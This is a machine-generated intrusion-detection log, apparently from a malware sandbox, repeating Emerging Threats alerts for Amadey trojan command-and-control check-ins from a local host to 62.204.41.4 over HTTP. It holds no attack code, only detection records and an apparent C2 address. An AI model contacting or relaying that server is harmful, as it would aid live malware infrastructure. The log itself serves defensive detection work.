Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449860802027700 02/07/23-20:01:29.628066
SID:	2027700
Source Port:	49860
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450252802027700 02/07/23-20:03:20.248979
SID:	2027700
Source Port:	50252
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450415802027700 02/07/23-20:04:02.837203
SID:	2027700
Source Port:	50415
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449789802027700 02/07/23-20:01:10.000649
SID:	2027700
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450160802027700 02/07/23-20:02:58.000084
SID:	2027700
Source Port:	50160
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450430802027700 02/07/23-20:04:06.494424
SID:	2027700
Source Port:	50430
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449832802027700 02/07/23-20:01:20.240759
SID:	2027700
Source Port:	49832
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450451802027700 02/07/23-20:04:11.626762
SID:	2027700
Source Port:	50451
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450013802027700 02/07/23-20:02:14.205368
SID:	2027700
Source Port:	50013
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450016802027700 02/07/23-20:02:14.953404
SID:	2027700
Source Port:	50016
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450365802027700 02/07/23-20:03:50.517630
SID:	2027700
Source Port:	50365
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450074802027700 02/07/23-20:02:32.940709
SID:	2027700
Source Port:	50074
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449924802027700 02/07/23-20:01:46.876099
SID:	2027700
Source Port:	49924
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449939802027700 02/07/23-20:01:52.546117
SID:	2027700
Source Port:	49939
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450273802027700 02/07/23-20:03:27.900257
SID:	2027700
Source Port:	50273
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450329802027700 02/07/23-20:03:41.705909
SID:	2027700
Source Port:	50329
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450059802027700 02/07/23-20:02:26.009359
SID:	2027700
Source Port:	50059
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449746802027700 02/07/23-20:00:57.646912
SID:	2027700
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450224802027700 02/07/23-20:03:13.408043
SID:	2027700
Source Port:	50224
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449865802027700 02/07/23-20:01:30.873059
SID:	2027700
Source Port:	49865
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449824802027700 02/07/23-20:01:18.327900
SID:	2027700
Source Port:	49824
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450005802027700 02/07/23-20:02:12.152880
SID:	2027700
Source Port:	50005
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450187802027700 02/07/23-20:03:04.340649
SID:	2027700
Source Port:	50187
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449995802027700 02/07/23-20:02:09.662326
SID:	2027700
Source Port:	49995
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449784802027700 02/07/23-20:01:06.918802
SID:	2027700
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450146802027700 02/07/23-20:02:54.625344
SID:	2027700
Source Port:	50146
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450265802027700 02/07/23-20:03:25.941004
SID:	2027700
Source Port:	50265
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450443802027700 02/07/23-20:04:09.644630
SID:	2027700
Source Port:	50443
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450402802027700 02/07/23-20:03:59.613926
SID:	2027700
Source Port:	50402
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449759802027700 02/07/23-20:01:00.829527
SID:	2027700
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450087802027700 02/07/23-20:02:36.507624
SID:	2027700
Source Port:	50087
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450290802027700 02/07/23-20:03:32.058144
SID:	2027700
Source Port:	50290
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450378802027700 02/07/23-20:03:53.744252
SID:	2027700
Source Port:	50378
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449978802027700 02/07/23-20:02:01.964465
SID:	2027700
Source Port:	49978
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449890802027700 02/07/23-20:01:36.846820
SID:	2027700
Source Port:	49890
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450159802027700 02/07/23-20:02:57.764941
SID:	2027700
Source Port:	50159
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450118802027700 02/07/23-20:02:44.402579
SID:	2027700
Source Port:	50118
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450337802027700 02/07/23-20:03:43.661817
SID:	2027700
Source Port:	50337
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449937802027700 02/07/23-20:01:52.063127
SID:	2027700
Source Port:	49937
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450046802027700 02/07/23-20:02:22.274271
SID:	2027700
Source Port:	50046
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449718802027700 02/07/23-20:00:50.878461
SID:	2027700
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450260802027700 02/07/23-20:03:22.605985
SID:	2027700
Source Port:	50260
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450306802027700 02/07/23-20:03:36.017602
SID:	2027700
Source Port:	50306
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450300802027700 02/07/23-20:03:34.563838
SID:	2027700
Source Port:	50300
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450211802027700 02/07/23-20:03:10.237661
SID:	2027700
Source Port:	50211
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450122802027700 02/07/23-20:02:45.389628
SID:	2027700
Source Port:	50122
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450474802027700 02/07/23-20:04:17.216226
SID:	2027700
Source Port:	50474
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449794802027700 02/07/23-20:01:11.263709
SID:	2027700
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449766802027700 02/07/23-20:01:02.341785
SID:	2027700
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449944802027700 02/07/23-20:01:53.792362
SID:	2027700
Source Port:	49944
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449855802027700 02/07/23-20:01:26.978024
SID:	2027700
Source Port:	49855
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449883802027700 02/07/23-20:01:35.109836
SID:	2027700
Source Port:	49883
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449962802027700 02/07/23-20:01:58.212789
SID:	2027700
Source Port:	49962
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450296802027700 02/07/23-20:03:33.595122
SID:	2027700
Source Port:	50296
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450033802027700 02/07/23-20:02:19.127549
SID:	2027700
Source Port:	50033
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449873802027700 02/07/23-20:01:32.847820
SID:	2027700
Source Port:	49873
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450385802027700 02/07/23-20:03:55.477920
SID:	2027700
Source Port:	50385
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450039802027700 02/07/23-20:02:20.584895
SID:	2027700
Source Port:	50039
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450128802027700 02/07/23-20:02:48.244683
SID:	2027700
Source Port:	50128
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450140802027700 02/07/23-20:02:53.167783
SID:	2027700
Source Port:	50140
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450217802027700 02/07/23-20:03:11.704054
SID:	2027700
Source Port:	50217
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450051802027700 02/07/23-20:02:23.494295
SID:	2027700
Source Port:	50051
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450095802027700 02/07/23-20:02:38.620537
SID:	2027700
Source Port:	50095
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449738802027700 02/07/23-20:00:55.702188
SID:	2027700
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450184802027700 02/07/23-20:03:03.616190
SID:	2027700
Source Port:	50184
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450227802027700 02/07/23-20:03:14.108353
SID:	2027700
Source Port:	50227
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449804802027700 02/07/23-20:01:13.672357
SID:	2027700
Source Port:	49804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450316802027700 02/07/23-20:03:38.501751
SID:	2027700
Source Port:	50316
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450357802027700 02/07/23-20:03:48.563249
SID:	2027700
Source Port:	50357
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450446802027700 02/07/23-20:04:10.384849
SID:	2027700
Source Port:	50446
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450405802027700 02/07/23-20:04:00.344097
SID:	2027700
Source Port:	50405
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449916802027700 02/07/23-20:01:43.294683
SID:	2027700
Source Port:	49916
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449934802027700 02/07/23-20:01:51.338963
SID:	2027700
Source Port:	49934
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449827802027700 02/07/23-20:01:19.034168
SID:	2027700
Source Port:	49827
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449756802027700 02/07/23-20:01:00.094396
SID:	2027700
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449893802027700 02/07/23-20:01:37.604134
SID:	2027700
Source Port:	49893
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450156802027700 02/07/23-20:02:57.043867
SID:	2027700
Source Port:	50156
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450280802027700 02/07/23-20:03:29.633131
SID:	2027700
Source Port:	50280
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449845802027700 02/07/23-20:01:23.372817
SID:	2027700
Source Port:	49845
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450061802027700 02/07/23-20:02:27.765974
SID:	2027700
Source Port:	50061
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450150802027700 02/07/23-20:02:55.620345
SID:	2027700
Source Port:	50150
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449982802027700 02/07/23-20:02:02.953057
SID:	2027700
Source Port:	49982
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450268802027700 02/07/23-20:03:26.680608
SID:	2027700
Source Port:	50268
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450067802027700 02/07/23-20:02:31.198973
SID:	2027700
Source Port:	50067
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450197802027700 02/07/23-20:03:06.840701
SID:	2027700
Source Port:	50197
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450423802027700 02/07/23-20:04:04.774413
SID:	2027700
Source Port:	50423
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450179802027700 02/07/23-20:03:02.638946
SID:	2027700
Source Port:	50179
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450464802027700 02/07/23-20:04:14.739715
SID:	2027700
Source Port:	50464
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450138802027700 02/07/23-20:02:52.674592
SID:	2027700
Source Port:	50138
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450286802027700 02/07/23-20:03:31.095393
SID:	2027700
Source Port:	50286
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450049802027700 02/07/23-20:02:23.003141
SID:	2027700
Source Port:	50049
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450245802027700 02/07/23-20:03:18.483828
SID:	2027700
Source Port:	50245
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450334802027700 02/07/23-20:03:42.924733
SID:	2027700
Source Port:	50334
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450375802027700 02/07/23-20:03:53.005630
SID:	2027700
Source Port:	50375
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449817802027700 02/07/23-20:01:16.563418
SID:	2027700
Source Port:	49817
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450436802027700 02/07/23-20:04:07.968971
SID:	2027700
Source Port:	50436
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449906802027700 02/07/23-20:01:40.847690
SID:	2027700
Source Port:	49906
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449728802027700 02/07/23-20:00:53.301055
SID:	2027700
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450344802027700 02/07/23-20:03:45.384589
SID:	2027700
Source Port:	50344
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450433802027700 02/07/23-20:04:07.254488
SID:	2027700
Source Port:	50433
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450191802027700 02/07/23-20:03:05.327791
SID:	2027700
Source Port:	50191
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449988802027700 02/07/23-20:02:04.410732
SID:	2027700
Source Port:	49988
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449903802027700 02/07/23-20:01:40.097751
SID:	2027700
Source Port:	49903
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449725802027700 02/07/23-20:00:52.567467
SID:	2027700
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449896802027700 02/07/23-20:01:38.330966
SID:	2027700
Source Port:	49896
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

